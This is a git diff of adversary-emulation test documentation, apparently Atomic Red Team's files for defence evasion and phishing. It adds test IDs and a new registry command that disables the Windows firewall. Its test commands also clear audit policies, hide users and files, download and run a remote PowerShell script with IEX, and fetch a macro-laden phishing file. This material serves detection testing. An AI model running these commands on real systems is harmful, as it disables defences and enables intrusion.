 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | falcond_path | The Crowdstrike Windows Sensor path. The Guid always changes. | path | C:&#92;ProgramData&#92;Package Cache&#92;{7489ba93-b668-447f-8401-7e57a6fe538d}&#92;WindowsSensor.exe|
 
@@ -800,10 +884,14 @@ To check the exclusion list using poweshell (Get-MpPreference).ExclusionPath
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 0b19f4ee-de90-4059-88cb-63c800c683ed
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | excluded_folder | This folder will be excluded from scanning | String | C:&#92;Temp|
 
@@ -837,10 +925,14 @@ To check the exclusion list using poweshell  (Get-MpPreference).ExclusionExtensi
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 315f4be6-2240-4552-b3e1-d1047f5eecea
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | excluded_exts | A list of extension to exclude from scanning | string | .exe|
 
@@ -874,10 +966,14 @@ To check the exclusion list using poweshell  (Get-MpPreference).ExclusionProcess
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a123ce6a-3916-45d6-ba9c-7d4081315c27
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | excluded_process | A list of processes to exclude from scanning | string | outlook.exe|
 
diff --git a/atomics/T1562.002/T1562.002.md b/atomics/T1562.002/T1562.002.md
index 1ca11b6f..213de5a4 100644
--- a/atomics/T1562.002/T1562.002.md
+++ b/atomics/T1562.002/T1562.002.md
@@ -26,10 +26,14 @@ Use the cleanup commands to restore some default auditpol settings (your origina
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 69435dcf-c66f-4ec0-a8b1-82beb76b34db
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | website_name | The name of the website on a server | string | Default Web Site|
 
@@ -61,6 +65,10 @@ Kill Windows Event Log Service Threads using Invoke-Phant0m. WARNING you will ne
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 41ac52ba-5d5e-40c0-b267-573ed90489bd
+
+
+
 
 
 
@@ -98,6 +106,10 @@ Disables the windows audit policy to prevent key host based telemetry being writ
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 5102a3a7-e2d7-4129-9e45-f483f2e0eea8
+
+
+
 
 
 
@@ -130,6 +142,10 @@ Clear the Windows audit policy using auditpol utility. This action would stop ce
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 913c0e4e-4b37-4b78-ad0b-90e7b25010f6
+
+
+
 
 
 
diff --git a/atomics/T1562.003/T1562.003.md b/atomics/T1562.003/T1562.003.md
index 5bce4173..d081df79 100644
--- a/atomics/T1562.003/T1562.003.md
+++ b/atomics/T1562.003/T1562.003.md
@@ -23,10 +23,14 @@ Disables history collection in shells
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 4eafdb45-0f79-4d66-aa86-a3e2c08791f5
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | evil_command | Command to run after shell history collection is disabled | String | whoami|
 
@@ -56,6 +60,10 @@ https://www.linuxjournal.com/content/using-bash-history-more-efficiently-histcon
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 468566d5-83e5-40c1-b338-511e1659628d
+
+
+
 
 
 #### Run it with these steps! 
diff --git a/atomics/T1562.004/T1562.004.md b/atomics/T1562.004/T1562.004.md
index ea17f6a6..27d556d3 100644
--- a/atomics/T1562.004/T1562.004.md
+++ b/atomics/T1562.004/T1562.004.md
@@ -10,13 +10,15 @@ Modifying or disabling a system firewall may enable adversary C2 communications,
 
 - [Atomic Test #2 - Disable Microsoft Defender Firewall](#atomic-test-2---disable-microsoft-defender-firewall)
 
-- [Atomic Test #3 - Allow SMB and RDP on Microsoft Defender Firewall](#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall)
+- [Atomic Test #3 - Disable Microsoft Defender Firewall via Registry](#atomic-test-3---disable-microsoft-defender-firewall-via-registry)
 
-- [Atomic Test #4 - Opening ports for proxy - HARDRAIN](#atomic-test-4---opening-ports-for-proxy---hardrain)
+- [Atomic Test #4 - Allow SMB and RDP on Microsoft Defender Firewall](#atomic-test-4---allow-smb-and-rdp-on-microsoft-defender-firewall)
 
-- [Atomic Test #5 - Open a local port through Windows Firewall to any profile](#atomic-test-5---open-a-local-port-through-windows-firewall-to-any-profile)
+- [Atomic Test #5 - Opening ports for proxy - HARDRAIN](#atomic-test-5---opening-ports-for-proxy---hardrain)
 
-- [Atomic Test #6 - Allow Executable Through Firewall Located in Non-Standard Location](#atomic-test-6---allow-executable-through-firewall-located-in-non-standard-location)
+- [Atomic Test #6 - Open a local port through Windows Firewall to any profile](#atomic-test-6---open-a-local-port-through-windows-firewall-to-any-profile)
+
+- [Atomic Test #7 - Allow Executable Through Firewall Located in Non-Standard Location](#atomic-test-7---allow-executable-through-firewall-located-in-non-standard-location)
 
 
 <br/>
@@ -27,10 +29,14 @@ Disables the firewall
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 80f5e701-f7a4-4d06-b140-26c8efd1b6b4
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | flavor_command | Command to disable firewall. Default firewalld. ufw (Ubuntu) command = ufw disable | String | systemctl stop firewalld ; systemctl disable firewalld|
 | cleanup_command | Command to enable firewall. Default firewalld. ufw (Ubuntu) command = ufw enable | String | systemctl enable firewalld ; systemctl start firewalld|
@@ -62,6 +68,10 @@ Caution if you access remotely the host where the test runs! Especially with the
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 88d05800-a5e4-407e-9b53-ece4174f197f
+
+
+
 
 
 
@@ -84,13 +94,50 @@ netsh advfirewall set currentprofile state on >nul 2>&1
 <br/>
 <br/>
 
-## Atomic Test #3 - Allow SMB and RDP on Microsoft Defender Firewall
+## Atomic Test #3 - Disable Microsoft Defender Firewall via Registry
+Disables the Microsoft Defender Firewall for the public profile via registry
+Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile...
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** afedc8c4-038c-4d82-b3e5-623a95f8a612
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 1 /f
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #4 - Allow SMB and RDP on Microsoft Defender Firewall
 Allow all SMB and RDP rules on the Microsoft Defender Firewall for all profiles.
 Caution if you access remotely the host where the test runs! Especially with the cleanup command which will reset the firewall and risk disabling those services...
 
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** d9841bf8-f161-4c73-81e9-fd773a5ff8c1
+
+
+
 
 
 
@@ -114,7 +161,7 @@ netsh advfirewall reset >nul 2>&1
 <br/>
 <br/>
 
-## Atomic Test #4 - Opening ports for proxy - HARDRAIN
+## Atomic Test #5 - Opening ports for proxy - HARDRAIN
 This test creates a listening interface on a victim device. This tactic was used by HARDRAIN for proxying.
 
 reference: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf
@@ -122,6 +169,10 @@ reference: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 15e57006-79dd-46df-9bf9-31bc24fb5a80
+
+
+
 
 
 
@@ -144,16 +195,20 @@ netsh advfirewall firewall delete rule name="atomic testing" protocol=TCP localp
 <br/>
 <br/>
 
-## Atomic Test #5 - Open a local port through Windows Firewall to any profile
+## Atomic Test #6 - Open a local port through Windows Firewall to any profile
 This test will attempt to open a local port defined by input arguments to any profile
 
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9636dd6e-7599-40d2-8eee-ac16434f35ed
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | local_port | This is the local port you wish to test opening | integer | 3389|
 
@@ -177,16 +232,20 @@ netsh advfirewall firewall delete rule name="Open Port to Any" | Out-Null
 <br/>
 <br/>
 
-## Atomic Test #6 - Allow Executable Through Firewall Located in Non-Standard Location
+## Atomic Test #7 - Allow Executable Through Firewall Located in Non-Standard Location
 This test will attempt to allow an executable through the system firewall located in the Users directory
 
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 6f5822d2-d38d-4f48-9bfc-916607ff6b8c
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | exe_file_path | path to exe file | path | PathToAtomicsFolder&#92;T1562.004&#92;bin&#92;AtomicTest.exe|
 
diff --git a/atomics/T1562.004/T1562.004.yaml b/atomics/T1562.004/T1562.004.yaml
index e123cf1b..24eeec66 100644
--- a/atomics/T1562.004/T1562.004.yaml
+++ b/atomics/T1562.004/T1562.004.yaml
@@ -36,6 +36,19 @@ atomic_tests:
     cleanup_command: |
       netsh advfirewall set currentprofile state on >nul 2>&1
     name: command_prompt
+- name: Disable Microsoft Defender Firewall via Registry
+  auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612
+  description: |
+    Disables the Microsoft Defender Firewall for the public profile via registry
+    Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile...
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f
+    cleanup_command: |
+      reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 1 /f
+    name: command_prompt
 - name: Allow SMB and RDP on Microsoft Defender Firewall
   auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1
   description: |
diff --git a/atomics/T1562.006/T1562.006.md b/atomics/T1562.006/T1562.006.md
index 0671e974..1db3c799 100644
--- a/atomics/T1562.006/T1562.006.md
+++ b/atomics/T1562.006/T1562.006.md
@@ -21,10 +21,14 @@ Emulates modification of auditd configuration files
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 212cfbcf-4770-4980-bc21-303e37abd0e3
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | audisp_config_file_name | The name of the audispd configuration file to be changed | string | audispd.conf|
 | auditd_config_file_name | The name of the auditd configuration file to be changed | string | auditd.conf|
@@ -66,10 +70,14 @@ Emulates modification of syslog configuration.
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf|
 | rsyslog_config_file_name | The name of the rsyslog configuration file to be changed | string | rsyslog.conf|
diff --git a/atomics/T1563.002/T1563.002.md b/atomics/T1563.002/T1563.002.md
index 7db2e09b..51534980 100644
--- a/atomics/T1563.002/T1563.002.md
+++ b/atomics/T1563.002/T1563.002.md
@@ -17,10 +17,14 @@ Adversaries may perform RDP session hijacking which involves stealing a legitima
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a37ac520-b911-458e-8aed-c5f1576d9f46
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | Session_ID | The ID of the session to which you want to connect | String | 1337|
 | Destination_ID | Connect the session of another user to a different session | String | rdp-tcp#55|
diff --git a/atomics/T1564.001/T1564.001.md b/atomics/T1564.001/T1564.001.md
index 34beb7d0..35dbb5bc 100644
--- a/atomics/T1564.001/T1564.001.md
+++ b/atomics/T1564.001/T1564.001.md
@@ -33,6 +33,10 @@ Creates a hidden file inside a hidden directory
 **Supported Platforms:** Linux, macOS
 
 
+**auto_generated_guid:** 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be
+
+
+
 
 
 
@@ -62,6 +66,10 @@ Hide a file on MacOS
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** cddb9098-3b47-4e01-9d3b-6f5f323288a9
+
+
+
 
 
 
@@ -87,10 +95,14 @@ and observe that the Attributes are "SA" for System and Archive.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** f70974c8-c094-4574-b542-2c545af95a32
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_to_modify | File to modify using Attrib command | string | %temp%&#92;T1564.001.txt|
 
@@ -113,7 +125,7 @@ del /A:S #{file_to_modify} >nul 2>&1
 ##### Description: The file must exist on disk at specified location (#{file_to_modify})
 ##### Check Prereq Commands:
 ```cmd
-IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) 
+IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -133,10 +145,14 @@ and observe that the Attributes are "SH" for System and Hidden.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** dadb792e-4358-4d8d-9207-b771faa0daa5
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_to_modify | File to modify using Attrib command | string | %temp%&#92;T1564.001.txt|
 
@@ -159,7 +175,7 @@ del /A:H #{file_to_modify} >nul 2>&1
 ##### Description: The file must exist on disk at specified location (#{file_to_modify})
 ##### Check Prereq Commands:
 ```cmd
-IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) 
+IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )
 ```
 ##### Get Prereq Commands:
 ```cmd
@@ -178,10 +194,14 @@ Requires Apple Dev Tools
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 3b7015f2-3144-4205-b799-b05580621379
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | filename | path of file to hide | path | /tmp/evil|
 
@@ -207,6 +227,10 @@ Hide a directory on MacOS
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** b115ecaf-3b24-4ed2-aefe-2fcb9db913d3
+
+
+
 
 
 
@@ -236,6 +260,10 @@ Show all hidden files on MacOS
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 9a1ec7da-b892-449f-ad68-67066d04380c
+
+
+
 
 
 
diff --git a/atomics/T1564.002/T1564.002.md b/atomics/T1564.002/T1564.002.md
index f5066ac0..766c53ee 100644
--- a/atomics/T1564.002/T1564.002.md
+++ b/atomics/T1564.002/T1564.002.md
@@ -19,10 +19,14 @@ Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 4238a7f0-a980-4fff-98a2-dfc0a363d507
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | user_name | username to add | string | APT|
 
@@ -52,10 +56,14 @@ Add a hidden user on macOS using IsHidden optoin
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** de87ed7b-52c3-43fd-9554-730f695e7f31
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | user_name | username to add | string | APT|
 
diff --git a/atomics/T1564.003/T1564.003.md b/atomics/T1564.003/T1564.003.md
index 90ebee33..cdc08590 100644
--- a/atomics/T1564.003/T1564.003.md
+++ b/atomics/T1564.003/T1564.003.md
@@ -22,10 +22,14 @@ Upon execution a hidden PowerShell window will launch calc.exe
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** f151ee37-9e2b-47e6-80e4-550b9f999b7a
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | powershell_command | Command to launch calc.exe from a hidden PowerShell Window | String | powershell.exe -WindowStyle hidden calc.exe|
 
diff --git a/atomics/T1564.004/T1564.004.md b/atomics/T1564.004/T1564.004.md
index 1ae1c4e7..6ad1f5eb 100644
--- a/atomics/T1564.004/T1564.004.md
+++ b/atomics/T1564.004/T1564.004.md
@@ -27,10 +27,14 @@ Execute from Alternate Streams
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 8822c3b0-d9f9-4daf-a043-49f4602364f4
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | path | Path of ADS file | path | c:&#92;ADS&#92;|
 
@@ -66,10 +70,14 @@ Upon execution cmd will run and attempt to launch desktop.ini. No windows remain
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 2ab75061-f5d5-4c1a-b666-ba2a50df5b02
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | payload_path | Path of file to hide in ADS | path | c:&#92;windows&#92;system32&#92;cmd.exe|
 | ads_file_path | Path of file to create an ADS under | path | C:&#92;Users&#92;Public&#92;Libraries&#92;yanki&#92;desktop.ini|
@@ -105,10 +113,14 @@ folder to view that the alternate data stream exists. To view the data in the al
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 17e7637a-ddaf-4a82-8622-377e20de8fdb
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_name | File name of file to create ADS on. | string | %temp%&#92;T1564.004_has_ads_cmd.txt|
 | ads_filename | Name of ADS. | string | adstest.txt|
@@ -141,10 +153,14 @@ in the %temp% direcotry to view all files with hidden data streams. To view the
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_name | File name of file to create ADS on. | string | $env:TEMP&#92;T1564.004_has_ads_powershell.txt|
 | ads_filename | Name of ADS file. | string | adstest.txt|
@@ -170,7 +186,7 @@ Remove-Item -Path #{file_name} -ErrorAction Ignore
 ##### Description: The file must exist on disk at specified location (#{file_name})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{file_name}) { exit 0 } else { exit 1 } 
+if (Test-Path #{file_name}) { exit 0 } else { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1564/T1564.md b/atomics/T1564/T1564.md
index 26ccd064..87730cb9 100644
--- a/atomics/T1564/T1564.md
+++ b/atomics/T1564/T1564.md
@@ -8,7 +8,7 @@ Adversaries may also attempt to hide artifacts associated with malicious behavio
 
 - [Atomic Test #1 - Extract binary files via VBA](#atomic-test-1---extract-binary-files-via-vba)
 
-- [Atomic Test #2 - Create a user called "$" as noted here](#atomic-test-2---create-a-user-called--as-noted-here)
+- [Atomic Test #2 - Create a Hidden User Called "$"](#atomic-test-2---create-a-hidden-user-called-)
 
 - [Atomic Test #3 - Create an "Administrator " user (with a space on the end)](#atomic-test-3---create-an-administrator--user-with-a-space-on-the-end)
 
@@ -31,6 +31,10 @@ oleObject.bin file is a payload that is parsed out and executed on the file syst
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 6afe288a-8a8b-4d33-a629-8d03ba9dad3a
+
+
+
 
 
 
@@ -40,7 +44,8 @@ oleObject.bin file is a payload that is parsed out and executed on the file syst
 ```powershell
 $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt")
 $macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin"
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
 Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap
 ```
 
@@ -59,7 +64,7 @@ try {
   New-Object -COMObject "Word.Application" | Out-Null
   Stop-Process -Name "winword"
   exit 0
-} catch { exit 1 } 
+} catch { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -72,12 +77,16 @@ Write-Host "You will need to install Microsoft Word manually to meet this requir
 <br/>
 <br/>
 
-## Atomic Test #2 - Create a user called "$" as noted here
+## Atomic Test #2 - Create a Hidden User Called "$"
 Creating a user with a username containing "$"
 
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 2ec63cc2-4975-41a6-bf09-dffdfb610778
+
+
+
 
 
 
@@ -106,6 +115,10 @@ Creating a user with a username containing with a space on the end
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 5bb20389-39a5-4e99-9264-aeb92a55a85c
+
+
+
 
 
 
diff --git a/atomics/T1564/T1564.yaml b/atomics/T1564/T1564.yaml
index 79e88e8f..c0874281 100644
--- a/atomics/T1564/T1564.yaml
+++ b/atomics/T1564/T1564.yaml
@@ -33,12 +33,13 @@ atomic_tests:
     command: |
       $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt")
       $macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin"
-      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
       Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap
     cleanup_command: |
       Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore
     name: powershell
-- name: Create a user called "$" as noted here
+- name: Create a Hidden User Called "$"
   auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778
   description: Creating a user with a username containing "$" 
   supported_platforms:
@@ -57,4 +58,4 @@ atomic_tests:
     name: powershell
     elevation_required: true 
     command: New-LocalUser -Name "Administrator " -NoPassword
-    cleanup_command: Remove-LocalUser -Name "Administrator " 2>&1 | out-null
\ No newline at end of file
+    cleanup_command: Remove-LocalUser -Name "Administrator " 2>&1 | out-null
diff --git a/atomics/T1566.001/T1566.001.md b/atomics/T1566.001/T1566.001.md
index 349306a5..4affc48e 100644
--- a/atomics/T1566.001/T1566.001.md
+++ b/atomics/T1566.001/T1566.001.md
@@ -16,10 +16,15 @@ There are many options for the attachment such as Microsoft Office documents, ex
 ## Atomic Test #1 - Download Phishing Attachment - VBScript
 The macro-enabled Excel file contains VBScript which opens your default web browser and opens it to [google.com](http://google.com).
 The below will successfully download the macro-enabled Excel file to the current location.
+File is downloaded to the %temp% folder.
 
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 114ccff9-ae6d-4547-9ead-4cd69f687306
+
+
+
 
 
 
@@ -31,13 +36,13 @@ if (-not(Test-Path HKLM:SOFTWARE\Classes\Excel.Application)){
   return 'Please install Microsoft Excel before running this test.'
 }
 else{
-  $url = 'https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'
+  $url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'
   $fileName = 'PhishingAttachment.xlsm'
   New-Item -Type File -Force -Path $fileName | out-null
   $wc = New-Object System.Net.WebClient
   $wc.Encoding = [System.Text.Encoding]::UTF8
   [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-  ($wc.DownloadString("$url")) | Out-File $fileName
+  Invoke-WebRequest -Uri $url -OutFile $fileName
 }
 ```
 
@@ -56,10 +61,14 @@ Upon execution, CMD will be lauchned and ping 8.8.8.8
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** cbb6799a-425c-4f83-9194-5447a909d67f
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | jse_path | Path for the macro to write out the "malicious" .jse file | String | C:&#92;Users&#92;Public&#92;art.jse|
 | ms_product | Maldoc application Word or Excel | String | Word|
@@ -69,7 +78,8 @@ Upon execution, CMD will be lauchned and ping 8.8.8.8
 
 
 ```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
 $macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"ping 8.8.8.8`"`n"
 Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
 ```
@@ -90,7 +100,7 @@ try {
   $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
   Stop-Process -Name $process
   exit 0
-} catch { exit 1 } 
+} catch { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1566.001/T1566.001.yaml b/atomics/T1566.001/T1566.001.yaml
index 52fb8b73..66e9d7d0 100644
--- a/atomics/T1566.001/T1566.001.yaml
+++ b/atomics/T1566.001/T1566.001.yaml
@@ -6,6 +6,7 @@ atomic_tests:
   description: |
     The macro-enabled Excel file contains VBScript which opens your default web browser and opens it to [google.com](http://google.com).
     The below will successfully download the macro-enabled Excel file to the current location.
+    File is downloaded to the %temp% folder.
   supported_platforms:
   - windows
   executor:
@@ -14,13 +15,13 @@ atomic_tests:
         return 'Please install Microsoft Excel before running this test.'
       }
       else{
-        $url = 'https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'
+        $url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'
         $fileName = 'PhishingAttachment.xlsm'
         New-Item -Type File -Force -Path $fileName | out-null
         $wc = New-Object System.Net.WebClient
         $wc.Encoding = [System.Text.Encoding]::UTF8
         [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-        ($wc.DownloadString("$url")) | Out-File $fileName
+        Invoke-WebRequest -Uri $url -OutFile $fileName
       }
     name: powershell
 - name: Word spawned a command shell and used an IP address in the command line
@@ -55,9 +56,10 @@ atomic_tests:
       Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
   executor:
     command: |
-      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
       $macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"ping 8.8.8.8`"`n"
       Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
     cleanup_command: |
       Remove-Item #{jse_path} -ErrorAction Ignore
-    name: powershell
\ No newline at end of file
+    name: powershell
diff --git a/atomics/T1566.001/bin/PhishingAttachment.xlsm b/atomics/T1566.001/bin/PhishingAttachment.xlsm
index ee236ea0..9cbfd3f7 100644
Binary files a/atomics/T1566.001/bin/PhishingAttachment.xlsm and b/atomics/T1566.001/bin/PhishingAttachment.xlsm differ
diff --git a/atomics/T1569.001/T1569.001.md b/atomics/T1569.001/T1569.001.md
index 62e0d648..a4b90c7a 100644
--- a/atomics/T1569.001/T1569.001.md
+++ b/atomics/T1569.001/T1569.001.md
@@ -19,10 +19,14 @@ Utilize launchctl
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 6fb61988-724e-4755-a595-07743749d4e2
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
